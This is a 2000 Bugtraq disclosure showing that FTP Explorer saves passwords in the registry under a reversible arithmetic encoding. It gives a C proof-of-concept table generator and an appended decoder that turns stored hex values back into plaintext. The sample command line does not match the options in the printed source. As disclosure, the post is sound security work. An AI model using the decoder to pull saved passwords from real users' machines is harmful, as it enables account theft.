[14036] in bugtraq
How the password could be recovered using FTP Explorer's registry!
daemon@ATHENA.MIT.EDU (Nelson)
Fri Feb 25 20:34:39 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.10002242035500.30645-100000@unreal.sekure.org>
Date: Thu, 24 Feb 2000 21:18:52 -0300
Reply-To: Nelson <stderr@UNREAL.SEKURE.ORG>
From: Nelson <stderr@UNREAL.SEKURE.ORG>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
The scene:
user -> nelson
pass -> ABC
In the Connect window, I typed login == nelson and pass == *** (ABC) and made a
connection to my own FTP server. After this, I found this KEY in the Windows
REGISTRY:
HKEY_CURRENT_USER -> Software -> FTP Explorer -> Profiles -> MY_OWN_SERVER
and I found two values:
Login = nelson
Type = 4A4E52
Hmmm... looks like an encrypted password to me...
OK, the crypt function in FTP Explorer works like this:
take the ASCII hex value and add 9; if the position in the password changes,
add 3 more per position.
In other words, an arithmetic progression.
I wrote some code to prove this; look at the result:
unreal:~/temp$ ./ftpe-crypt -t 3 -i 9 -r 3 -s teste
Criptografia do FTP Explorer v0.6b - por Nelson Brito
unreal:~/temp$ more teste
[...]
A = 4A = 4D = 50
`-> correct
B = 4B = 4E = 51
`-> correct
C = 4C = 4F = 52
`-> correct
[...]
Well, the password is 'ABC'... Is it a big security hole? I think so...
PS: The credit for starting this thread in BOS-Br <bos@sekure.org> goes to
Hever <Hever@vitech.net>.
PPS: Sorry about my poor ENGLISH. If you don't understand, don't read. =)
My proof...
-------begin
/*
** This code demonstrates how the "cryptography" of the FTP Explorer
** software works, based on the information passed to BOS-Br by
** Hever<Hever@vitech.net>.
**
** author: Nelson Brito
** e-mails: nelson@sekure.org & nelson@secunet.com.br
** program: ftpe-crypt.c
**
** ChangeLog:
** v 0.6b - output file added
**        - from this version on, all command-line arguments are required
** v 0.5b - long command-line options added
**        - problems with the '-h' option fixed thanks to fpm :*( ) )
** v 0.4  - command-line options added, letting the user "set" their
**          preferences [a.k.a. getopt(3)]
** v 0.3  - arguments passed to the r2() function added
**        - counter to be used as an argument in r2()
** v 0.2  - r2() function developed, u_abort() and logo() added
**        - the password length was increased
** v 0.1  - initial development of the program skeleton, including:
**          > removal of special characters, i.e. only [a-z][A-Z][0-9]
**          > a simple arithmetic progression, with no formula or function
**
** Thanks to drk, Morauder and fpm for the help with getopt(3). =)
**
** How to compile:
** lameness:~# gcc -Wall -O3 -g ftpe-crypt.c -o ftpe-crypt
*/
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <unistd.h>

#define VERSION "0.6b"

/* One term of the progression: n is the character's ASCII value, p its
** position in the password, i the ratio (3 for FTP Explorer) and b the
** base increment (9 for FTP Explorer). Writes the term in hex to fp. */
int r2(int n, int p, int i, int b, FILE *fp){
    n = (n + b) + (i * p);
    fprintf(fp, "= %X ", n);
    return(n);
}

/* Print the usage text and exit; never returns, so it is void rather than char. */
void usage(char *p){
    fprintf(stderr, "use: %s -l <length> -i <increment> -r <ratio> -o <output-file>\n", p);
    fprintf(stderr, "example: %s -l 15 -i 9 -r 3 -o outlist\n", p);
    fprintf(stderr, "options:\n\t -l, --length password's length\n");
    fprintf(stderr, "\t -i, --increment ASCII Table's increment\n");
    fprintf(stderr, "\t -r, --ratio PA's ratio\n");
    fprintf(stderr, "\t -o, --output output file\n");
    fprintf(stderr, "\nfor ftpe's criptography use r=3, i=9\n");
    exit(0);
}

int main(int ac, char **av){
    FILE *outlist = NULL;
    int a, c;
    int r = 0, inc = 0, ct = 0, op;
    static struct option long_options[] = {
        {"length", 1, 0, 'l'},
        {"ratio", 1, 0, 'r'},
        {"increment", 1, 0, 'i'},
        {"output", 1, 0, 'o'},
        {0, 0, 0, 0}
    };

    printf("FTP Explorer's Criptography v%s - by Nelson Brito\n", VERSION);
    /* all four options with their arguments are mandatory */
    if(ac != 9) usage(av[0]);
    while((op = getopt_long(ac, av, "l:r:i:o:", long_options, NULL)) != -1){
        switch(op){
        case 'l':
            ct = atoi(optarg);
            break;
        case 'r':
            r = atoi(optarg);
            break;
        case 'i':
            inc = atoi(optarg);
            break;
        case 'o':
            if(!(outlist = fopen(optarg, "w"))){
                printf("unable to open %s\n", optarg);
                exit(1);
            }
            break;
        default:
            usage(av[0]);
            break;
        }
    }
    if(!outlist || ct <= 0) usage(av[0]);

    /* Walk the ASCII table from '0' (48) to 'z' (122), skipping the punctuation
    ** between '9' and 'A' (58-64) and between 'Z' and 'a' (91-96). */
    for(a = 48; a < 123; a++){
        if((a >= 58 && a <= 64) || (a >= 91 && a <= 96)) continue;
        fprintf(outlist, "%c ", (char)a);
        /* one column per password position: ascii + inc + r*position */
        for(c = 0; c < ct; c++) r2(a, c, r, inc, outlist);
        fprintf(outlist, "\n");
    }
    fclose(outlist);
    return(0);
}
-------end
That's all,
--
Nelson - nb
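Added example, not Nelson's code: the progression the post describes (ASCII value + 9, plus 3 more per position) applied in both directions, to show that the registry "Type" value is a reversible encoding rather than a hash, so anyone who can read the profile key recovers the plaintext. It assumes two hex digits per character, as in the stored value 4A4E52; the function and macro names are my own.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
/* Parameters the post derives for FTP Explorer: add 9, then 3 more per position. */
#define FTPE_INC   9
#define FTPE_RATIO 3

/* Encode a plaintext password into the hex form seen in the registry "Type" value.
   Returns 0 on success, -1 if out is too small or a byte would exceed 0xFF
   (assumption: two hex digits per character, as in the post's 4A4E52). */
int ftpe_encode(const char *pw, char *out, size_t outlen) {
    size_t n = strlen(pw);
    if (outlen < 2 * n + 1) return -1;
    for (size_t i = 0; i < n; i++) {
        int v = (unsigned char)pw[i] + FTPE_INC + FTPE_RATIO * (int)i;
        if (v > 0xFF) return -1;
        sprintf(out + 2 * i, "%02X", v);
    }
    out[2 * n] = '\0';
    return 0;
}

/* Invert the progression: subtract 9 and 3*position from each byte.
   Returns 0 on success, -1 on odd length, non-hex input or a non-printable result. */
int ftpe_decode(const char *hex, char *out, size_t outlen) {
    size_t n = strlen(hex);
    if (n % 2 != 0 || outlen < n / 2 + 1) return -1;
    for (size_t i = 0; i < n / 2; i++) {
        unsigned v;
        if (!isxdigit((unsigned char)hex[2 * i]) || !isxdigit((unsigned char)hex[2 * i + 1])) return -1;
        if (sscanf(hex + 2 * i, "%2x", &v) != 1) return -1;
        int c = (int)v - FTPE_INC - FTPE_RATIO * (int)i;
        if (c < 0x20 || c > 0x7E) return -1;
        out[i] = (char)c;
    }
    out[n / 2] = '\0';
    return 0;
}

/* Round trip: 1 if pw encodes to expected_hex and that decodes back to pw. */
int ftpe_roundtrip_ok(const char *pw, const char *expected_hex) {
    char hex[64], back[32];
    if (ftpe_encode(pw, hex, sizeof hex) != 0 || strcmp(hex, expected_hex) != 0) return 0;
    return ftpe_decode(hex, back, sizeof back) == 0 && strcmp(back, pw) == 0;
}
int main(void) {
    char hex[64];                     /* the post's example: "ABC" is stored as 4A4E52 */
    if (ftpe_encode("ABC", hex, sizeof hex) == 0) printf("ABC -> %s\n", hex);
    return 0;
}
```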